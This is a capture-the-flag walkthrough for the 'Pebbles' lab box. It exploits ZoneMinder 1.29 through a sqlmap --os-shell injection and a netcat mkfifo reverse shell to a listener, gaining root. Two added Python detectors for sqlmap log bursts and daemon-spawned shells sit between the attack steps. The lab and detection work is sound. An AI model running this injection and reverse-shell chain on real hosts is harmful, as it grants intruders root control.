Pebbles
Exploitation Guide for Pebbles | Proving Grounds
After brute-forcing directories we find a vulnerable application (ZoneMinder). We then exploit it with SQLMap to get a shell. No privilege escalation is required, because the shell we get already runs as root.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]
└─$ nmap $ip -p- -T4 -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3305/tcp open odette-ftp syn-ack
8080/tcp open http-proxy syn-ack
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_ 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pebbles
3305/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Apache Tomcat
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]
└─$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50| tee gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.245.52/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/22 01:19:22 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.245.52/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.245.52/css/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.245.52/javascript/]
/zm (Status: 301) [Size: 313] [--> http://192.168.245.52/zm/]
Visiting the /zm directory, we find a ZoneMinder console running on the server, version 1.29.0.
A quick searchsploit query gives the following result:
┌──(imtodess㉿deathnote)-[~]
└─$ searchsploit zoneminder 1.29
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery | php/webapps/41239.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
sqlmap http://$ip/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
After some time we will get the shell.
[10:26:06] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
[10:26:24] [INFO] retrieved:
root
command standard output: 'root'
os-shell>
os-shell> which nc
[10:28:15] [INFO] retrieved: /bin/nc
command standard output: '/bin/nc
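From the defender's side, the --os-shell step above leaves a distinctive trace in the web server's access log. The following Python script is an added example, not part of the original writeup or of ZoneMinder: it scans Apache combined-format log lines for two indicators, the User-Agent that sqlmap sends by default, and a burst of POST requests to /zm/index.php from a single client within a few seconds, which --os-shell produces even when the User-Agent is changed with --random-agent. The log lines, the second and third client IPs and the sqlmap version string are constructed for this example. Apache does not record POST bodies, so the injected parameters themselves are only visible to a WAF or a ModSecurity audit log; the access log can still show who and how often.

```python
"""Added example (not from the original writeup): flag sqlmap-style activity
against the ZoneMinder endpoint in Apache combined-format access logs.

Indicators checked:
  1. the default sqlmap User-Agent ("sqlmap/<version> ...")
  2. a burst of POST requests to the same endpoint from one client IP inside
     a short window, which --os-shell produces regardless of User-Agent.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" LogFormat:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one normal visitor, one client with the default
# sqlmap User-Agent, one client hiding behind a browser User-Agent but still
# hammering the endpoint. IPs other than 192.168.49.79 and the sqlmap version
# string are made up for this example.
SAMPLE_LOG = """\
192.168.49.200 - - [22/Aug/2021:10:25:51 +0000] "GET /zm/ HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.49.200 - - [22/Aug/2021:10:25:55 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "http://192.168.245.52/zm/" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.49.79 - - [22/Aug/2021:10:26:01 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "sqlmap/1.5.8#stable (http://sqlmap.org)"
192.168.49.79 - - [22/Aug/2021:10:26:01 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "sqlmap/1.5.8#stable (http://sqlmap.org)"
192.168.49.79 - - [22/Aug/2021:10:26:02 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "sqlmap/1.5.8#stable (http://sqlmap.org)"
192.168.49.79 - - [22/Aug/2021:10:26:02 +0000] "POST /zm/index.php HTTP/1.1" 500 0 "-" "sqlmap/1.5.8#stable (http://sqlmap.org)"
192.168.49.79 - - [22/Aug/2021:10:26:03 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "sqlmap/1.5.8#stable (http://sqlmap.org)"
10.0.0.5 - - [22/Aug/2021:10:30:10 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.5 - - [22/Aug/2021:10:30:10 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.5 - - [22/Aug/2021:10:30:11 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.5 - - [22/Aug/2021:10:30:12 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.5 - - [22/Aug/2021:10:30:12 +0000] "POST /zm/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["status"] = int(entry["status"])
    return entry


def parse_log(text):
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def find_sqlmap_ua(entries):
    """Entries whose User-Agent carries the default sqlmap signature."""
    return [e for e in entries if "sqlmap" in e["ua"].lower()]


def find_post_bursts(entries, path="/zm/index.php",
                     window=timedelta(seconds=10), threshold=5):
    """IPs that sent at least `threshold` POSTs to `path` inside any `window`.

    Sliding window over the sorted timestamps of each client; errors (5xx)
    are counted too, since blind/error-based probing produces them.
    """
    by_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == path:
            by_ip[e["ip"]].append(e["ts"])
    flagged = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def analyse(log_text):
    """Summarise both indicators for a block of log text."""
    entries = parse_log(log_text)
    return {
        "entries": len(entries),
        "sqlmap_ua_ips": sorted({e["ip"] for e in find_sqlmap_ua(entries)}),
        "burst_ips": sorted(find_post_bursts(entries)),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The User-Agent check is cheap but trivially evaded; the burst check is the one worth keeping, and its threshold should be tuned against the normal request rate of the ZoneMinder console, which polls its log view on its own.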
Since the target machine has nc installed, we use it to send back a shell with root privileges.
# change the IP and port to match your listener
os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.79 3305 >/tmp/f
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]
└─$ nc -nvlp 3305
listening on [any] 3305 ...
connect to [192.168.49.79] from (UNKNOWN) [192.168.79.52] 45580
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# which python3
/usr/bin/python3
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@pebbles:/var/lib/mysql# cd
cd
root@pebbles:~# ls
ls
proof.txt
root@pebbles:~# cat proof.txt
cat proof.txt
<Flag_Redacted>
root@pebbles:~#
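The shell lands in /var/lib/mysql as root, which is consistent with the command having been executed from the database server process, itself running as root; had mysqld run under an unprivileged account, the same injection could not have handed over a root shell. The following Python script is an added example, not part of the original writeup: it walks a process table and flags shells or network tools descended from a server daemon, and daemons with no instance running under an unprivileged account. The process table is constructed for the example (PIDs and process names are made up); on a live host it would come from `ps -eo pid,ppid,user,comm` or /proc.

```python
"""Added example (not from the original writeup): find shells spawned under a
server daemon, and daemons running only as root, in a process table.

The table below is constructed for this example. Real input would be the
output of `ps -eo pid,ppid,user,comm` (header line dropped).
"""
from collections import defaultdict, namedtuple

Proc = namedtuple("Proc", "pid ppid user comm")

# Daemons that should never have a shell among their descendants.
SERVICE_DAEMONS = {"mysqld", "mariadbd", "apache2", "httpd", "php-fpm"}
# Process names that indicate command execution or a network pivot.
SUSPECT_CHILDREN = {"sh", "bash", "dash", "nc", "ncat", "netcat", "python3", "perl"}

# Constructed sample: a legitimate SSH login shell, a database server that
# has spawned "sh -> nc", and an Apache master with a www-data worker.
SAMPLE_PS = """\
1 0 root systemd
400 1 root sshd
401 400 imtodess sshd
402 401 imtodess bash
500 1 root mysqld
501 500 root sh
502 501 root nc
600 1 root apache2
601 600 www-data apache2
"""


def parse_ps(text):
    """Map pid -> Proc from 'pid ppid user comm' lines."""
    procs = {}
    for line in text.splitlines():
        pid, ppid, user, comm = line.split()
        procs[int(pid)] = Proc(int(pid), int(ppid), user, comm)
    return procs


def ancestry(procs, pid):
    """Chain from the process itself up to the top of the tree."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def shells_under_services(procs):
    """(pid, daemon, path) for suspect processes with a service daemon ancestor."""
    findings = []
    for p in sorted(procs.values()):
        if p.comm not in SUSPECT_CHILDREN:
            continue
        chain = ancestry(procs, p.pid)
        for anc in chain[1:]:
            if anc.comm in SERVICE_DAEMONS:
                path = " -> ".join(f"{q.comm}[{q.pid}]" for q in reversed(chain))
                findings.append((p.pid, anc.comm, path))
                break
    return findings


def root_only_services(procs):
    """Daemons with no instance under an unprivileged account.

    A root master process with unprivileged workers (apache2) is normal;
    a daemon whose every instance is root (mysqld here) is not.
    """
    users = defaultdict(set)
    for p in procs.values():
        if p.comm in SERVICE_DAEMONS:
            users[p.comm].add(p.user)
    return sorted(comm for comm, us in users.items() if us == {"root"})


if __name__ == "__main__":
    table = parse_ps(SAMPLE_PS)
    for pid, daemon, path in shells_under_services(table):
        print(f"pid {pid} descends from {daemon}: {path}")
    print("daemons running only as root:", root_only_services(table))
```

The ancestry walk is what catches the case on this box even if the shell is renamed: the relationship to mysqld, not the process name, is the signal. Pair it with a cron or auditd rule so the check runs continuously rather than once.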